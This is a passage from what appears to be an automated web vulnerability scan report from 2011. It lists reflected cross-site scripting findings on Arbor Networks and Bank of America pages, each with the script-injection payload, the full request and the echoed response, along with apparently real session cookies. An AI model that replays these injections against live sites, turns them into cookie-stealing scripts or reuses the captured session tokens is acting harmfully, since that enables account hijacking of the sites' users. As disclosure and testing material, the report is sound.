Cookie: __qca=P0-1465904929-1294800439843; s_vi=[CS]v1|26968B0D051593FE-600001A2C00484CA[CE]; OAX=rcHW800tFhsAALQo; RMAM=01TFSM_.4fI8bZDG|TFSM_1700.4fKIQL6G|; wxbug_cookie1=camera_id=&dma=&lang_id=en-US&zip=&city=50064&postal_code=&stat=SABE&city_name=Buenos Aires&state_code=&state_name=&country=AR&country_name=Argentina&region=10&region_name=South America&units=0&has_cookies=1; RMFD=011PdrDqO101FnC|O101FnE|O101GDp; wxbug_cookie2=&country_name0=Argentina&state_code0=&city_name0=Buenos Aires&zip0=&stat0=SABE&country_name1=USA&state_code1=&city_name1=&zip1=&stat1=SABE&country_name2=&state_code2=&city_name2=&zip2=&stat2=&country_name3=&state_code3=&city_name3=&zip3=&stat3=&country_name4=&state_code4=&city_name4=&zip4=&stat4=; __utma_a2a=6534489744.1326357366.1294800440.1295040624.1295040629.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=utf-8
p3p: CP="NON DSP COR NID"
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 01:33:34 GMT
Connection: close
Content-Length: 2113


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>WeatherBug&r
...[SNIP]...
<a href='http://weather.weatherbug.com/Macau/Macao-weather.html?zcode=z5545cce12'style='x:expression(alert(1))'28b5d32a9d&units=1&stat=VMMC' target='_blank' style='text-decoration:none;'>
...[SNIP]...

3.70. http://www.arbornetworks.com/index.php [Itemid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /index.php

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 889f8"><script>alert(1)</script>a4569f63444 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?option=com_performs&formid=20&Itemid=76889f8"><script>alert(1)</script>a4569f63444&id=112 HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:50:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=41c910c218fb8d3dde5e7afce882c91b; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:24 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:24 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:25 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:50:28 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html
Content-Length: 37618


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<form enctype="multipart/form-data" method="post" action="/index.php?option=com_performs&formid=20&Itemid=76889f8"><script>alert(1)</script>a4569f63444&id=112&Itemid=76889f8\&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;a4569f63444&id=112" name="InfrastructureSecurityReport"
id="InfrastructureSecurityReport">
...[SNIP]...

3.71. http://www.arbornetworks.com/index.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /index.php

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba0d0"><script>alert(1)</script>718295ddb4 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?option=com_performs&formid=20&Itemid=76&id=112ba0d0"><script>alert(1)</script>718295ddb4 HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:50:44 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=fadd3809d81b132b8f85a5e9ab0ae0d9; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:45 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:45 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:46 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:50:48 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html
Content-Length: 38715


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<form enctype="multipart/form-data" method="post" action="/index.php?option=com_performs&formid=20&Itemid=76&id=112ba0d0"><script>alert(1)</script>718295ddb4&Itemid=76&id=112ba0d0\&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;718295ddb4" name="InfrastructureSecurityReport"
id="InfrastructureSecurityReport">
...[SNIP]...

3.72. http://www.arbornetworks.com/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 458c5"><script>alert(1)</script>6fafaf87cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?option=com_performs&formid=20&Itemid=76&id=112&458c5"><script>alert(1)</script>6fafaf87cd=1 HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:51:15 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=6050b437cb834c6dd502f609c181f33c; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:51:16 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:51:16 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:51:17 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:51:17 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html
Content-Length: 38736


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<form enctype="multipart/form-data" method="post" action="/index.php?option=com_performs&formid=20&Itemid=76&id=112&458c5"><script>alert(1)</script>6fafaf87cd=1&Itemid=76&id=112" name="InfrastructureSecurityReport"
id="InfrastructureSecurityReport">
...[SNIP]...

3.73. http://www.bankofamerica.com/creditcards/index.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /creditcards/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4b49"><script>alert(1)</script>f4d8274700e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /creditcardsa4b49"><script>alert(1)</script>f4d8274700e/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:10 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1604761259.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/creditcardsa4b49"><script>alert(1)</script>f4d8274700e/index.cfm">
...[SNIP]...

3.74. http://www.bankofamerica.com/deposits/checksave/index.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /deposits/checksave/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9fa1"><script>alert(1)</script>1cb498be8e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /depositse9fa1"><script>alert(1)</script>1cb498be8e3/checksave/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:53 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1655092907.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/depositse9fa1"><script>alert(1)</script>1cb498be8e3/checksave/index.cfm">
...[SNIP]...

3.75. http://www.bankofamerica.com/deposits/checksave/index.cfm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /deposits/checksave/index.cfm

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 491c6"><script>alert(1)</script>20cb5e334dd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /deposits/checksave491c6"><script>alert(1)</script>20cb5e334dd/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:54 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1604761259.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/deposits/checksave491c6"><script>alert(1)</script>20cb5e334dd/index.cfm">
...[SNIP]...

3.76. http://www.bankofamerica.com/financialtools/index.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /financialtools/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac50f"><script>alert(1)</script>4765bb30cc9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /financialtoolsac50f"><script>alert(1)</script>4765bb30cc9/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:36:08 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/financialtoolsac50f"><script>alert(1)</script>4765bb30cc9/index.cfm">
...[SNIP]...

3.77. http://www.bankofamerica.com/findit/locator.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /findit/locator.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bee12"><script>alert(1)</script>8e3b0539708 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /finditbee12"><script>alert(1)</script>8e3b0539708/locator.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:35:37 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/finditbee12"><script>alert(1)</script>8e3b0539708/locator.cfm">
...[SNIP]...

3.78. http://www.bankofamerica.com/help/equalhousing.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /help/equalhousing.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58bd1"><script>alert(1)</script>2153a6eecc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /help58bd1"><script>alert(1)</script>2153a6eecc8/equalhousing.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:33:29 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/help58bd1"><script>alert(1)</script>2153a6eecc8/equalhousing.cfm">
...[SNIP]...

3.79. http://www.bankofamerica.com/help/equalhousing_popup.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /help/equalhousing_popup.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bddc5"><script>alert(1)</script>c62490d0000 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /helpbddc5"><script>alert(1)</script>c62490d0000/equalhousing_popup.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:25 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1453766315.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/helpbddc5"><script>alert(1)</script>c62490d0000/equalhousing_popup.cfm">
...[SNIP]...

3.80. http://www.bankofamerica.com/help/index.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /help/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec464"><script>alert(1)</script>899a7c53100 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /helpec464"><script>alert(1)</script>899a7c53100/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:33:44 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/helpec464"><script>alert(1)</script>899a7c53100/index.cfm">
...[SNIP]...

3.81. http://www.bankofamerica.com/loansandhomes/index.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /loansandhomes/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a99e1"><script>alert(1)</script>5ff4d40fe3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /loansandhomesa99e1"><script>alert(1)</script>5ff4d40fe3b/index.cfm?template=lc_mortgage HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:35:59 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/loansandhomesa99e1"><script>alert(1)</script>5ff4d40fe3b/index.cfmtemplate=lc_mortgage">
...[SNIP]...

3.82. http://www.bankofamerica.com/onlinebanking/index.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /onlinebanking/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 864f9"><script>alert(1)</script>190e5f7b296 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /onlinebanking864f9"><script>alert(1)</script>190e5f7b296/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:00 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1604761259.20480.0000; path=/


<html>
   <head>
       <title>Bank of America</title>
       <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css">
   </head>

   <body bgcolor="#ffffff" text=
...[SNIP]...
<input type="hidden" name="URL" value="http://www.bankofamerica.com/onlinebanking864f9"><script>alert(1)</script>190e5f7b296/index.cfm">
...[SNIP]...

3.83. http://www.bankofamerica.com/pap/index.cfm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /pap/index.cfm

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88c92"><script>alert(1)</script>201cd186128 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pap88c92"><script>alert(1)</script>201cd186128/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

